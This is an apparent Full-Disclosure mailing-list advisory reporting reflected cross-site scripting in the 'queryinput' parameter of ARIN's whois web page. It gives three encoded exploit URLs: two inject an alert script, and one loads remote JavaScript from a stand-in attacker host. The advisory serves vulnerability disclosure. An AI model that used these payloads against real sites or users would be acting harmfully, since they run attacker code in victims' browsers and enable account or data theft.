[Full-disclosure] Arin.net XSS

[Terminal Entry <Security@xxxxxxxxxx>]

Title
ARIN.NET input validation holes in "?queryinput=" allows remote users conduct 
cross-site scripting attacks

Notification
Multiple attempts to contact Arin site administrators went unanswered

Exploit Included:  Yes

Description
The "?queryinput=" script does not properly validate user-supplied input in 
several parameters to filter HTML code. A remote user can create a specially 
crafted URL that, when loaded by a target user, will cause arbitrary scripting 
code to be executed by the target user's browser. 

Some demonstration exploit URLs are provided:
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E

Discovered by Terminal Entry security [.at.] peadro (.)net

This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed. If 
you have received this email in error please notify the system manager. This
message contains confidential information and is intended only for the 
individual named. If you are not the named addressee you should not disseminate,
distribute or copy this e-mail. Please notify the sender immediately by e-mail 
if you have received this e-mail by mistake and delete this e-mail from your
system. If you are not the intended recipient you are notified that disclosing, 
copying, distributing or taking any action in reliance on the contents of this
information is strictly prohibited.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/